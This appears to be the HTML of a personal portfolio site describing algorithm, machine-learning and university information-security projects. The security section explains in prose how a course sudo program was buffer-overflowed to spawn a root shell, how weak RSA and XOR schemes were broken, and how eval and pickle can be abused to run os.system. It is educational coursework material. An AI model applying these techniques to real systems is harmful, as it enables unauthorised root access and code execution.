-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
831 lines (779 loc) · 55.4 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-150824762-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-150824762-1');
</script>
<meta charset="UTF-8">
<meta name="description" content="Nadav Gover. Software developer, electrical engineer. Here is my portfolio">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Nadav Gover</title>
<!-- <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="https://unpkg.com/flickity@2/dist/flickity.min.css">
<link href="lity-2.4.0/dist/lity.css" rel="stylesheet">
<link rel="stylesheet" href="style.css">
<link href='https://fonts.googleapis.com/css?family=Work Sans' rel='stylesheet'>
<link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet'>
<script src="https://unpkg.com/flickity@2/dist/flickity.pkgd.min.js"></script>
<script src="lity-2.4.0/vendor/jquery.js"></script>
<script src="lity-2.4.0/dist/lity.js"></script>
<!-- <script src="script.js"></script> -->
<!-- <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> -->
</head>
<body>
<div class="slider">
<div class="load">
</div>
<div class="content">
<div class="principal">
<div class="title">
<span class="name">Nadav Gover</span>
</div>
<p class="quotation">
Logic will get you from A to B.
Imagination
will take you everywhere.</p>
<span class="quotation-author">— Albert Einstein</span>
<!-- <h1>Welcome</h1>
<p>Lorem ipsum dolor, sit amet consectetur adipisicing.</p> -->
</div>
</div>
</div>
<header class="header">
<!-- <div class="title">
<a class="name">Nadav Gover</a>
</div>
<p class="quotation">
Logic will get you from A to B.
<span class="green-word">Imagination</span>
will take you everywhere.</p>
<footer class="quotation-author">— Albert Einstein</footer> -->
<nav class="">
<ul class="scrollable">
<!-- <li><img src="static/img/logo.jpg" alt="nadav gover profile picture" class="logo"></li> -->
<li><a href="#about">About</a></li>
<li><a href="#projects">Projects</a></li>
<li><a href="#algo-coding">Algorithmic Coding</a></li>
<li><a href="#machine-learning">Machine Learning</a></li>
<li><a href="#infosec">Information Security</a></li>
<li><a href="#contact">Contact</a></li>
<li><a href="static/pdf/Nadav_Gover_Resume.pdf">Resume</a></li>
<!-- <li class="float-right"><a href="http://www.github.com/nadavgover" target="_blank"> <i class="fa fa-lg fa-github"></i></a></li> -->
</ul>
</nav>
</header>
<section id="about">
<h3 class="section-title">About Me</h3>
<div class="section-description">
<p>
Hi! I'm Nadav. An electrical engineer and a developer from Ma'agan Michael, Israel. It's really cool here, you should come and visit. Really, come and visit.
You can smell the sea from here, and thanks to it, it has become a big part of me. I go there a lot and spend my summers there. I love to dive and I'm a certified dive master.
Hiking is also something I do a lot. I like best to hike in Israel, close to home. I believe it's important to know your surroundings before you explore far places, and what's a better way to do so than hiking?
A part from hiking and diving, I also do some other sports. I'm a big tennis fan (Federer of course, don't tell me if you are a Nadal fan. Seriously, don't) and I play some myself.
Also, might be a bit surprising, I play a lot of chess. Chess is a great game which just has a bad stigma of a boring game, in fact it is very interesting.
My goal is to become a chess Grandmaster.
</p>
<p>
Most of my developing skills I acquired myself. That's how I learn the best, through hands-on and trial and error.
I consider my programming skills to be very good (if I may) and I don't feel limited with any task or challenge that I would take.
If I encounter a problem during coding, I have to solve it, for the simple reason that otherwise I just won't fall asleep at night. Well that's a problem.
<br>
My B.Sc in electrical engineering I got in Tel Aviv University. Specializing in computers (hardware and software) and feedback and control systems.
I was alwyas more drawn to the field of computers and software, or to be specific, to the fields of machine learning and information security.
</p>
<p>
So I guess this pretty much summarizes me in a few words. Now check out some of the projects I did over the years.
</p>
</div>
</section>
<section id="projects" class="projects-container">
<h3 class="section-title">Projects</h3>
<!-- <div class="section-description">
<p>Check out some of my projects I did over the years.</p>
</div> -->
<div class="project-category-container first">
<h5 id="algo-coding" class="project-category">
Algorithmic Coding
</h5>
<div class="carousel-container">
<div class="carousel" data-flickity='{ "imagesLoaded": true, "initialIndex": 0, "setGallerySize": true, "wrapAround": true, "watchCSS": true }'>
<div class="carousel-cell aspect-ratio-524-610" data-aspect-ratio="297:297">
<a href="#sudoku" data-lity><img src="static/img/sudoku.JPG" alt="Sudoku Solver" ></a>
</div>
<div class="carousel-cell aspect-ratio-832-579" data-aspect-ratio="235:214">
<a href="#wikipedia" data-lity><img src="static/img/wikipedia.jpg" alt="Wikipedia Game" ></a>
</div>
<div class="carousel-cell aspect-ratio-3806-2894" data-aspect-ratio="1200:1040">
<a href="#passover-map" data-lity><img src="static/img/knapsack.jpg" alt="Multiple Knapsack Problem"></a>
</div>
<div class="carousel-cell aspect-ratio-1280-623" data-aspect-ratio="1200:1040">
<a href="#splitwise" data-lity><img src="static/img/splitwise.png" alt="Multiple Knapsack Problem"></a>
</div>
</div>
</div>
</div>
<div class="project-category-container">
<h5 id="machine-learning" class="project-category">
Machine Learning
</h5>
<div class="carousel-container">
<div class="carousel" data-flickity='{ "imagesLoaded": true, "initialIndex": 0, "setGallerySize": true, "wrapAround": true, "watchCSS": true }'>
<div class="carousel-cell aspect-ratio-796-765">
<a href="#mnist" data-lity><img src="static/img/mnist.JPG" alt="mnist digit recognition" ></a>
</div>
<div class="carousel-cell aspect-ratio-1280-623">
<a href="#iris-svm" data-lity><img src="static/img/iris_scatter_plot.png" alt="Iris data set scatter plot" ></a>
</div>
<div class="carousel-cell aspect-ratio-1280-623">
<a href="#unsupervised-learning" data-lity><img src="static/img/em_clusters_wide.png" alt="EM algorithm clusters"></a>
</div>
<div class="carousel-cell aspect-ratio-1031-625">
<a href="#cnn" data-lity><img src="static/img/cnn.jpg" alt="Convolutional Neural Network"></a>
</div>
</div>
</div>
</div>
<div class="project-category-container last">
<h5 id="infosec" class="project-category">
Information Security
</h5>
<div class="carousel-container">
<div class="carousel" data-flickity='{ "imagesLoaded": true, "initialIndex": 0, "setGallerySize": true, "wrapAround": true, "watchCSS": true }'>
<div class="carousel-cell aspect-ratio-4032-3024" data-aspect-ratio="297:297">
<a href="#cryptography" data-lity><img src="static/img/cryptography.jpg" alt="Cryptography" ></a>
</div>
<div class="carousel-cell aspect-ratio-439-417" data-aspect-ratio="235:214">
<a href="#bof" data-lity><img src="static/img/bof.JPG" alt="Buffer Overflow" ></a>
</div>
<div class="carousel-cell aspect-ratio-604-295" data-aspect-ratio="1200:1040">
<a href="#logical-vulner" data-lity><img src="static/img/logical_vulnerabilities.JPG" alt="Logical Vulerabilities"></a>
</div>
<div class="carousel-cell aspect-ratio-841-259" data-aspect-ratio="1200:1040">
<a href="#libc-rop" data-lity><img src="static/img/rop.JPG" alt="Return to libc and ROP"></a>
</div>
</div>
</div>
</div>
<!--light boxes-->
<div id="sudoku" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Sudoku Solver</h2>
<p>The Suduko solver, as it names implies, solves a Sudoku puzzle using <a href="https://en.wikipedia.org/wiki/Backtracking" target="_blank">backtracking algorithm</a>.
It is implemented with Python.
</p>
<p>
This is probably the first project I've done with Python. The decision to make this project
came during a 6 hours long bus ride with my friends. We had nothing to do during the ride and one of the friends
brought a newspaper with him. So we started solving all the puzzles there. When we got to the hard Suduko, it seemed as it was
too hard for us to do during a bus ride. It was in this moment where I decided that I will never solve a Suduko puzzle ever again.
When I got home I immidiately started working on the Sudoku solver.
</p>
<p>
You know how when you come about to solve a Sudoku you right small digits in the corner of a cell, meaning only these numbers can occupy this cell,
otherwise it will be a violation of the Sudoku rules? So that's what the Suduko solver knew what to do in the beginning.
It went through all the puzzle and remembered what can go where. After that, it looked where it had only one option for a cell and filled this number in. And do this all over again until you finish.
So:
<ol>
<li>Iterate through all the cells in the puzzle and check all the options for each cell</li>
<li>Fill in all the cells that have only one option</li>
<li>Repeat until the Sudoku is solved</li>
</ol>
</p>
<p>
While this method works well on easy Sudokus, it fails to solve hard ones.
The reason is that hard Sudokus often don't have a cell with only one option, which will cause the proposed method to go in an infinite loop.
So we need to come up with a new method to overcome this problem.
</p>
<p>
Insted of repeating infinitly, we can guess a number from the list of options we got in step 1, try to solve the Sudoku with this guess, and if it works then this is a solution. If not (e.g. same number in same row), we track our steps backwads and guess the next number in the list of options.
This method is called backtracking.
Since we know that one of the options has to solve the puzzle, we can be sure that we will not encounter an infinite loop this time. So:
<ol>
<li>If Sudoku rules are not violated: <br>
 Iterate through all the cells in the puzzle and check all the options for each cell <br>
 If some cells have one option: <br>
  Fill in all the cells that have only one option <br>
 Else: (must guess a number) <br>
  Pick the cell with the fewest options (this will help it run faster) and guess one of the options
</li>
<li>
Else: (if sudoku rules are violated) <br>
 Back track. Delte all changes from last guess and guess another number.
</li>
<li>Repeat until the Sudoku is solved</li>
</ol>
This is usually implemented with recursion, and so is the case in my sudoku solver.
</p>
<p>
<a href="https://github.com/nadavgover/Sudoku-Solver" target="_blank">View code</a> on GitHub
</p>
<p>
<a href="https://repl.it/@NadavGover/Sudoku-Solver" target="_blank">Try it yourself</a> just press the green run button
</p>
</div>
</div>
<div id="wikipedia" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Wikpedia Game</h2>
<p>
The rules of the wikipepdia game are simple. Players start on a randomly selected Wikipedia page and must navigate to another given page only, by clicking links in the current article.
The goal is to arrive at the destination page with the fewest number of clicks (steps) and in the least amount of time.
</p>
<p>
This project is all about winning this game. Given a source page and a destination page, the program yields the shortest path between them.
And when you say shortest path, you say <a href="https://en.wikipedia.org/wiki/Breadth-first_search" target="_blank">Breadth-first search (BFS)</a> algorithm.
And indeed this project was implemented with the BFS algorithm and using linked lists with Python.
</p>
<p>
The BFS algorithm finds the shortest path from a node in a tree to another node. For that we need a tree and to define what each node is.
So each node in the tree is a wikipedia page, the root of the tree being the source page, and the descendents of each node are the links in its wikipedia page.
Also, in BFS there is a use of queue, so the queue was implemented with a linked list.
The algorithm guarentees to yield the shortest path but there might be more than one path with the same length.
</p>
<p>
<a href="https://github.com/nadavgover/Wikipedia-Game" target="_blank">View code</a> on GitHub
</p>
<p>
<a href="https://repl.it/@NadavGover/Wikipedia-Game" target="_blank">Try it yourself</a>, just press the green run button
</p>
</div>
</div>
<div id="passover-map" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Bin Packing Problem</h2>
<p>
In the <a href="https://en.wikipedia.org/wiki/Bin_packing_problem" target="_blank">Bin Packing problem</a>
items of different volumes must be packed into a finite number of bins or containers each of volume V in a way that minimizes the number of bins used.
It differs from the <a href="https://en.wikipedia.org/wiki/Knapsack_problem">multiple knapsack problem</a>
in that all items have to be packed to certain bins, whereas, in the multiple knapsack problem a subset of items can be selected.
</p>
<p>
The motivation for this project is to optimally place guests in an event with limited amount of tables.
To make an analogy to the bin packing problem, the tables are the bins and the guests are the items. This problem is known to be NP-hard.
To implement this with a short run time there was a use of <a href="https://en.wikipedia.org/wiki/Dynamic_programming" target="_blank">dynamic programming</a>.
A matrix with rows representing the guests and columns representing the tables was implemented. Each entry
in the matrix is the amount of guests that could be placed with the current tables set.
</p>
<p>
Each guest may have a constraint or multiple constraints. For example, a guest can ask to be in a certain table or to sit next to some other guest.
Perhaps the guest requires a wheel chair and not all tables have that option. And many other constraints that were not mentioned here.
</p>
<p>
All of this, the dynamic programming (dp) matrix takes into account and yields the best result
with run time of <br> O(number of guests + number of tables).
</p>
<p>
Bonus fact: This project is actually used in practice to place guests in the passover "seder" of Kibbutz Maagan Michael
</p>
<p>
<a href="https://github.com/nadavgover/Passover-Map" target="_blank">View code</a> on GitHub
</p>
</div>
</div>
<div id="mnist" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Digit Recognition</h2>
<p>
This project is divided in to two parts.
In the first part there was a use of a multi-class perceptron classifier. A multi-class perceptron classifier is the extension of the <a href="https://en.wikipedia.org/wiki/Perceptron#Learning_algorithm" target="_blank">Perceptron Learning Algorithm</a> (PLA) for binary classification.
One-vs-all strategy was used which means each class was trained to identify if the input is from its class or not (binary classification).
The input, in this case (so as in the second part of this project), was the MNIST data set which is constructed out of 70,000 images of hand written digits between 0-9. This means that for the multi-class classifier 10 different classes were trained (1 for each digit).
To then predict the input image correctly, the label that gets the highest confidence is the prediction.
</p>
<p>
Since the input data is not linearly separable, PLA will never terminate, and its behavior can become quite unstable, and can jump from a good perceptron to a very bad one within one update.
To overcome this, the <a href="https://en.wikipedia.org/wiki/Perceptron#Variants" target="_blank">pocket algorithm</a> was used. This algorithm keeps 'in its pocket' the best weight vector encountered up to iteration t in PLA.
In the end, the best weight vector will be reported as the final hypothesis.
</p>
<p>
In the second part of the project a <a href="https://en.wikipedia.org/wiki/Multinomial_logistic_regression" target="_blank">Softmax Regression</a> was applied on the MNIST dataset.
Softmax regression (or multinomial logistic regression) is a generalization of logistic regression to the case where we want to handle multiple classes.
The cost function is the <a href="https://en.wikipedia.org/wiki/Cross_entropy" target="_blank">cross-entropy error</a> but generalized to K classes.
The composition function is the <a href="https://en.wikipedia.org/wiki/Sigmoid_function" target="_blank">sigmoid</a> function. Since zero valued inputs can artificially kill weight updates, the inputs were scaled to be between 0.01 to 1 and not 0 to 1.
The weights were updated using <a href="https://en.wikipedia.org/wiki/Gradient_descent" target="_blank">gradient descent</a>.
</p>
<p>
Just to demonstrate one of the difficulties of this classifier, look at the following image and see how similar 9 can be to 4, for example:
<br>
<img src="static/img/mnist_misclassification.png" alt="mnist misclassification" style="width: 100%; max-width: 300px;">
<br>
In the above image there is an example of misclassification. The predicted class is 9 and the actual class is 4.
This image would most likely be interpreted for a human reader as either a 4 or a 9 (perhaps even tending more to 9 as classified) and maybe the reader will need a context to understand.
This image comes to demonstrate the difficulty of a human reader to distinguish between these two classes so all the more so to a computer and all the more so to a computer without a context.
</p>
<p>
<a href="https://github.com/nadavgover/Digit-Recognition/" target="_blank">View code</a>, final reults and conclusions on GitHub
</p>
<p>
<a href="https://repl.it/@NadavGover/Digit-Recognition" target="_blank">Try it yourself</a> just press the green run button
</p>
</div>
</div>
<div id="iris-svm" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Iris (flower) Classifier</h2>
<p>
In this project the input is the Iris data set. It consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor), so 150 total samples.
One class is linearly separable from the other two; the latter are not linearly separable from each other.
Four features were measured from each sample: the length and the width of sepals and petals, in centimeters.
scatter plot of the data set:
<br>
<br>
<img src="static/img/iris_scatter_plot.png" alt="scatter plot of iris data set" style="width: 100%; max-width: 800px;">
</p>
<p>
In this project models were trained with <a href="https://en.wikipedia.org/wiki/Support-vector_machine" target="_blank">Support-vector machines (SVM)</a> using <a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2016/02/tr-98-14.pdf" target="_blank">Sequential Minimal Optimization (SMO)</a> with linear and RBF kernels.
To compare those two models, consider these two criteria: run time and performance.
The run time of both models is approximately 10 seconds. The differences between the run times can be neglected because they are very small.
Performance in the sense of accuracy the RBF kernel achieved in average 5% more than the linear kernel. The RBF kernel preformed well on both the linearly separable data and the non-linearly separable data while the linear kernel preformed well only on the linearly separable data.
</p>
<p>
<a href="https://github.com/nadavgover/Iris-Classifier-with-SVM" target="_blank">View code</a>, final reults and conclusions on GitHub
</p>
</div>
</div>
<div id="unsupervised-learning" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Unsupervised Learning with K-means and EM Algorithms</h2>
<p>
In this project you can see the <a href="https://en.wikipedia.org/wiki/K-means_clustering" target="_blank">K-means</a> and <a href="https://en.wikipedia.org/wiki/Expectation%E2%80%93maximization_algorithm" target="_blank">Expectation Maximization (EM)</a> algorithms in action.
This two algorithms are applied when unsupervised learning clustering is needed.
In this project there are two 2-dimensional multivariate gaussian processes.
The data set was created from the given processes with 2,000 samples (1,000 samples for each process) and is shown below:
<br>
<img src="static/img/true_clusters.png" alt="true clusters" style="width: 100%; max-width: 500px;">
<br>
In the above image we can see the two clusters created and their centroids (or means).
</p>
<p>
<strong>K-means:</strong> k-means clustering aims to partition n observations into k clusters in which each observation belongs to the cluster with the nearest mean.
The K-means algorithm was implemented with K=2 (meaning two clusters) and the Euclidean distance metric and was run for 100 iterations.
The initialization vectors were chosen randomly to be 2 different samples of the data set.
The clusters at the end of the run are as follows:
<br>
<img src="static/img/kmeans_clusters.png" alt="k-means clusters" style="width: 100%; max-width: 500px;">
</p>
<p>
<strong>EM: </strong> The EM iteration alternates between performing an expectation (E) step, which creates a function for the expectation of the log-likelihood evaluated using the current estimate for the parameters,
and a maximization (M) step, which computes parameters maximizing the expected log-likelihood found on the E step.
These parameter-estimates are then used to determine the distribution of the latent variables in the next E step.
The model parameters are: centroids (mean vectors), covariance matrices and mixing coefficients (how many samples in each cluster)
The algorithm was implemented using an iteration formula that is consistent with diagonal covariance matrices.
The clusters at the end of the run are as follows:
<br>
<img src="static/img/em_clusters.png" alt="EM algorithm clusters" style="width: 100%; max-width: 500px;">
<br>
</p>
<p>
In both the K-means and EM we got convergence early on. The main difference is in the mean vectors. While the mean vector of the cluster with mean μ=(3,3) is similar in both algorithms, the mean vector μ=(1,1) is much closer on the EM algorithm.
<br>
This is explained by the difference between the algorithms:
<br>
<br>
K-means:
<ol>
<li>Hard assign a data point to one particular cluster on convergence.</li>
<li>It makes use of the Euclidian distance</li>
</ol>
EM:
<ol>
<li>Soft assigns a point to clusters (so it gives a probability of any point belonging to any centroid).</li>
<li>It doesn't depend on the Euclidian distance, but is based on the Expectation, i.e., the probability of the point belonging to a particular cluster. </li>
</ol>
This makes k-means biased towards spherical clusters.
<br>
In conclusion, the accuracy of the K-means was lower as compared to that of the EM algorithm.
The tendency of K-means to produce spherical clusters leads to bad results here, while EM benefits from the Gaussian distributions present in the data set.
</p>
<p>
<a href="https://github.com/nadavgover/Unsupervised-Learning-Clustering" target="_blank">View code</a>, final reults and conclusions on GitHub
</p>
</div>
</div>
<div id="cryptography" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Cryptography</h2>
<h3>Stream Cipher</h3>
<p>
In this project we focus on a simple stream cipher called Repeated Key cipher. A repeated key cipher works by XOR-ing the bytes of the plaintext with the bytes of the key similarly to a one-time pad:
<ul>
<li>The first byte of the plaintext is XOR-ed with the first byte of the key</li>
<li>The second byte of the plaintext is XOR-ed with the second byte of the key</li>
<li>...</li>
<li>If the plaintext is longer than the key, start using the key again from the beginning (first it’s first byte, then it’s second byte, etc.)</li>
</ul>
</p>
<h4>Plaintext Score</h4>
<p>
We need a way to distinguish between Enlglish to Gibrish, so we need to make a scoring system. The scoring system is a system such that a text containing a plausible text in English will receive (with a high probability) a higher score than a random text.
<ol>
<li>For example, it gives this string "I am a sentence!" a higher score than "\xc6\xc9u\xd0v\x14\xe2\xcf\xc5\xf5\x1eZ\x10Yd\xd3".</li>
</ol>
In this project, this is done by comparing the letter frequency in the plaintext to the well known studied frequency of letters in the English language.
The way it was implemeted was creating a histogram of letters in the plain text, afterwards turning this histogram into probabilties by dividing each letter by the number of letters.
Then we needed to come up with an error estimation, a way to measure if the frequency of letters is consistent with English.
The error measure is chosen to be the MSE (mean square average). This was implemented by taking the difference between the frequency of the letters in the plaintext (in the histogram) and the frequency of letters in English. Then squaring this difference.
Summing all the differences together and dividing by the number of letters to get the mean.
This gave us a number between 0-1, the closer to zero means less error and therefore means more probable to be english. Since we want to make a score that a higher score is better so we simply multiply the mse by -1.
This method alone might work for long texts, where the frequency of letters are lined up.
</p>
<h4>Brute Force</h4>
<p>
We can also brute force the key. <br/>
We need to attempt all possible keys of a given length, evaluate the plaintext possibilities using the plaintext scoring system, and return the “correct” plaintext.
</p>
<h4>Smarter Break</h4>
<p>
The problem with the brute force method is, well, that it’s brute force.<br/>
This means we try many attempts without much thought. Trying to a break a key longer than a few bytes is going to be impractical (as we need 2<sup>8(number of bytes)</sup> attempts).<br/>
So we need to find a way which is much faster, and for example, can break a key of length 10 or higher. And we may assume the ciphertext is long.
<br/>
We can take advantage of the fact that we know the encryption algorithm and based on the assumption that the ciphertext is long.
The way decided here to take advantage of the poor encryption algorithm is to make the cipher text to blocks in the size of the key length. Since every byte of the ciphertext in steps of the size of key length was encrypted with the same byte of the key, we can say that it was encrypted with a key of the length of one!!! Now all we have to do is break the one byte key by brutefoce.
Well this is not a hard task, we just iterate over all 256 options, take a score and return the best score.
We obviously need to do that as many times as the length of the key, but every time it is just brute forcing a key with length of 1. This fact makes it a not time consuming method and therefore feasible.
</p>
<h3>RSA</h3>
In this section we broke several simplistic schemes that are based on RSA. <br/>
We have an (hypothetical) ATM.
After inserting the credit card, the machine sends both the credit card and the PIN code the user entered, to a remote server for verification. Once the server responds, the ATM verifies the response and if it’s valid, it gives the user his money.
When a user enters a 4-digit PIN code, the machine encrypts it with a 2048 bit RSA public key before sending it to the server. The goal is to get the pin.<br/>
Since we know the pin is a 4 digit number, we can iterate through all possible options and encrypt them using the encryption method of RSA. we can compare each option with the encrypted pin we intercepted.
And that's how we can exploit it and find the matched pin.<br/>
The same ATM machine also sends the encrypted credit card number, a 8-9 digit number, to the server. Since the developers of the ATM were paranoid, they encrypted the credit card number with a different 2048 bit RSA key.<br/>
The task is to find the card number.<br/>
This time the vulnerability is that e is small (e = 3).
We notice that the biggest credit card number is 999999999 and that this number to the power of e is less than n.
So we can say that this solution is correct only for small e.
We remember that in RSA the encryption is c = m<sup>e</sup> (mod n), but in this case, since m<sup>e</sup> is less than n, c = m<sup>e</sup>.
So we can take the logarithm of both sides (Let's say base 10, doesn't matter).
Computing the log of this number is not hard computationaly.
After all algebra we get m = 10<sup>(log(c) / e)</sup>
<p>
<a href="https://github.com/nadavgover/Cryptography" target="_blank">View code</a> on GitHub
</p>
</div>
</div>
<div id="bof" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Buffer Overflow (BOF)</h2>
<h3>Background</h3>
<p>
In this project, we exploited a vulnerability to gain root permissions.
The program we attacked is sudo - a standard program included on Unix systems, and
used to execute commands with root permissions.
<ul>
<li>Like most file systems, each file is owned by a user/group</li>
<li>One of the permissions bits on a file is the setuid bit</li>
<li>When set, this bit causes a program to automatically run under the permissions of the user owning the file</li>
<li>The sudo program is owned by the root user and has the setuid bit on</li>
<li>When a user tries to use sudo, it checks the user belongs to the sudo’ers user
group, and then executes the command</li>
</ul>
It should now be clear why it’s attractive to attack the sudo program. With our goal
set clearly, let’s begin
</p>
<h3>Cracking sudo</h3>
<p>
We have a sudo program, which receives a password and executes a command as root iff the password is correct.
However, you we don’t know the password… We also have the source code for the program.
<br>
The vulnerability in this code is using strcat with wrong sizes.
Since the buffer length is 20, and 10 bytes are already full and that the password is also 10 bytes long,
So we actually can get to the address buffer[20] (normally buffer[19] would be \0) and put there whatever we want.
Using IDA and the source code we can see that the variable auth is right above the buffer on the stack.
So if we overflow the buffer it actually overflows into auth.
We can see that when auth is 1 the validation returns true.
Since auth was already initialized to zero, if we change the last bit of it to 1, it will be 1.
This would not work if auth was not initialized to zero because then the high bytes of auth (the bytes we don't have access to) will not be zero.
So using this fact, we can put in the last byte of our password the value of 1.
</p>
<h3>Opening Bash</h3>
<h4>Crashing sudo</h4>
<p>
In order to open bash we need to understand how the program works. We do it by crashing it. We're crashing the program and generating a core dump.
We then can open the core dump using GDB and understand how the buffer is arranged.
<br>
The vulnerability here is that there is an unsafe use of strcat.
There is no length checking for the password and it is passed into the strcat as is, and a buffer overflow occured.
Using this we could just input a long password to overwrite the return address (RA) and crash the program.
We used an informative input so we would understand where the RA is by reading the stack pointer (ESP) is.
This caused a segmentation fault and generated a core dump.
</p>
<h4>Writing the shellcode</h4>
<p>
The core dump of a program is a “snapshot” of the program memory and
registers at the point in time right when it crashed. We can open it using GDB to find some important things.
<ul>
<li>Find where the buffer begins (let’s call this X)</li>
<li>Find at which offset from the beginning of the buffer, we have the
value we want to “update” (let’s call this offset Y)</li>
<li>Now, we know what we should do - create a buffer of size Y, beginning
with the shellcode, followed by padding (if needed) until we reach a
length of Y, and then finally add the address X.</li>
<li>Illustration of the process:
<br>
<img src="static/img/bof.JPG" alt="buffer overflow illustraion" style="width: 100%; max-width: 300px;">
<br>
</li>
<li>Now, the final part is writing the shellcode. This was done here by making a syscall to execve</li>
</ul>
After crashing the program and creating a core file, we read it using gdb.
We crashed the program with an easy to identify input, this way we can identify the addresses of the registers.
We used GDB to find the address of the beginning of the buffer (by looking at the address of the first byte of the input).
Also using GDB, we can find the address where instruction pointer (EIP) is pointing to (the address of EIP when the program crashed).
By substracting those two values we can find out what is the offset from the beginning of the buffer to the return address (RA).
Inside this offset we put our shellcode and in RA we put the address of the beginning of the buffer.
also a small nop slide was used to make sure we don't miss anything in the shellcode.
The shellcode was written in assembly, it was important not to write any 0's otherwise the strcat would stop cat'ing and the RA would not be overwritten.
the shellcode is bassically: execve(/bin/sh, [/bin/sh, null], [null]) since these are the parameters needed to execve.
to create 0's (or null) we used xor of a register with itself, and by doing that the shellcode did not contain 0's.
After the shellcode we still had some space until the RA so it was padded with nop's.
<br>
And finally the password that was inputed was: nop_slide + shellcode + nop_padding + address_of_beginning_of_buffer.
By using this we achieved root access.
</p>
<p>
<a href="https://github.com/nadavgover/Buffer-Overflow" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
<div id="logical-vulner" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Logical Vulnerabilities</h2>
<p>
Dealing with user input can be a difficult task. Especially when the user has malicious intentions.
In this project we have some examples of programs with user input that can be exploited. The common ground for all of the examples is that the writer of the
program meant the user to input x but the user instead input y and thus hacking the program.
</p>
<h3>Unsafe use of eval()</h3>
<p>
For example, a python program with the use of eval function in it. eval is very sensitive because if we can inject os.system() in it we can get full
control of the program.
</p>
<h3>Unsafe use of pickle.load() </h3>
<p>
Another example in this project is an unsafe use of python's pickle module. The pickle module allows us to define how the data will be pickled using __reduce__ function.
It returns a tuple of callable and arguments.
We can use the callable as os.system and the arguments as echo hacked (for example).
